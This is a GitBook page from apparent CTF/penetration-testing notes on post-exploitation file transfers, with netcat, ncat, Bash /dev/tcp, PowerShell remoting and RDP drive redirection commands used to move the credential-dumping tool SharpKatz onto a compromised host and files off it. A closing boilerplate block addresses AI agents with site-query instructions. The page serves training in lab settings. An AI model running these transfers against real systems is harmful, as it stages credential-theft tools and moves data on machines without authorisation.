> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/post-exploitation/file-transfers/miscellaneous-file-transfer-methods.md).

# Miscellaneous File Transfer Methods

## Miscellaneous file transfer methods

Use this page when common HTTP, SMB, or language-based methods are unavailable.

It covers `netcat`, `ncat`, PowerShell remoting, and RDP drive redirection.

{% hint style="info" %}
**Attacker** means your box, Pwnbox, or redirector.

**Compromised host** means the machine you already accessed.
{% endhint %}

Each workflow below marks which side runs each command.

### Netcat and Ncat

`nc` and `ncat` can move files in either direction.

Pick the direction that fits the firewall path.

`ncat` is the modern Nmap implementation.

On some systems, `nc`, `ncat`, and `netcat` may point to the same binary.

#### Send a file from the attacker to the compromised host

This flow works well when the compromised host can accept an inbound connection.

In this example, the attacker sends `SharpKatz.exe` to the compromised host.

**Step 1**

**Compromised host — listen with original Netcat**

```bash
nc -l -p 8000 > SharpKatz.exe
```

**Compromised host — listen with Ncat**

```bash
ncat -l -p 8000 --recv-only > SharpKatz.exe
```

**Step 2**

**Attacker — download the file you want to send**

```bash
wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
```

**Attacker — send the file with original Netcat**

```bash
nc -q 0 <compromised-ip> 8000 < SharpKatz.exe
```

**Attacker — send the file with Ncat**

```bash
ncat --send-only <compromised-ip> 8000 < SharpKatz.exe
```

Replace `<compromised-ip>` with the target IP.

`-q 0` and `--send-only` close the session after the file finishes sending.

#### Make the compromised host pull the file from the attacker

This flow helps when inbound access to the compromised host is blocked.

The attacker listens and serves the file.

The compromised host connects out and saves it.

**Original Netcat**

**Attacker — listen and send the file**

```bash
sudo nc -l -p 443 -q 0 < SharpKatz.exe
```

**Compromised host — connect back and save the file**

```bash
nc <attacker-ip> 443 > SharpKatz.exe
```

**Ncat**

**Attacker — listen and send the file**

```bash
sudo ncat -l -p 443 --send-only < SharpKatz.exe
```

**Compromised host — connect back and save the file**

```bash
ncat <attacker-ip> 443 --recv-only > SharpKatz.exe
```

Replace `<attacker-ip>` with your listener IP.

#### Use `/dev/tcp` when Netcat is missing

Bash can read from `/dev/tcp/host/port`.

This is useful when the compromised host has Bash but no `nc`.

**Attacker — listen and send the file with original Netcat**

```bash
sudo nc -l -p 443 -q 0 < SharpKatz.exe
```

**Attacker — listen and send the file with Ncat**

```bash
sudo ncat -l -p 443 --send-only < SharpKatz.exe
```

**Compromised host — receive the file through `/dev/tcp`**

```bash
cat < /dev/tcp/<attacker-ip>/443 > SharpKatz.exe
```

The same pattern also works in reverse.

You can receive a file on the attacker and send it from the compromised host.

### PowerShell remoting

Use PowerShell remoting when HTTP, HTTPS, or SMB transfer paths are unavailable.

This requires WinRM access and enough rights on the remote system.

By default, WinRM listens on:

* `5985/tcp` for HTTP
* `5986/tcp` for HTTPS

In this example, `DC01` copies files to and from `DATABASE01`.

#### Verify WinRM access

**Compromised Windows host or admin foothold — confirm your current context**

```powershell
whoami
hostname
```

**Compromised Windows host or admin foothold — test WinRM on the remote host**

```powershell
Test-NetConnection -ComputerName DATABASE01 -Port 5985
```

#### Create the remoting session

**Compromised Windows host or admin foothold — open a PowerShell session**

```powershell
$Session = New-PSSession -ComputerName DATABASE01
```

#### Copy files through the session

**Compromised Windows host or admin foothold — copy a local file to the remote host**

```powershell
Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\
```

**Compromised Windows host or admin foothold — copy a remote file back to the current host**

```powershell
Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session
```

{% hint style="info" %}
These commands run from the Windows system where you already have the PowerShell session.

That system may be your current compromised host or another host you control in the environment.
{% endhint %}

### RDP drive redirection

RDP lets you move files by copy and paste or by redirecting a local drive.

Drive redirection is usually more reliable.

#### Mount a local Linux folder in the RDP session

**Attacker — mount a local folder with `rdesktop`**

```bash
rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
```

**Attacker — mount a local folder with `xfreerdp`**

```bash
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
```

Inside the RDP session, browse to `\\tsclient\` to access the redirected folder.

That lets you copy files between your local machine and the remote desktop session.

![Windows File Explorer showing a network folder named 'tsclient' with a subfolder 'linux'.](https://cdn.services-k8s.prod.aws.htb.systems/content/modules/24/tsclient.jpg)

#### Use the native Windows RDP client

From Windows, you can also use `mstsc.exe` and enable local drive sharing before connecting.

![Remote Desktop Connection settings showing options for configuring remote audio, keyboard shortcuts, and local resources like printers and drives.](https://cdn.services-k8s.prod.aws.htb.systems/content/modules/24/rdp.png)

{% hint style="warning" %}
If Windows Defender scans the redirected folder, it may delete flagged files.

Be careful when sharing payload directories.
{% endhint %}

{% hint style="info" %}
Redirected drives are only available inside that RDP session.

Other logged-in users cannot access them directly.
{% endhint %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/post-exploitation/file-transfers/miscellaneous-file-transfer-methods.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
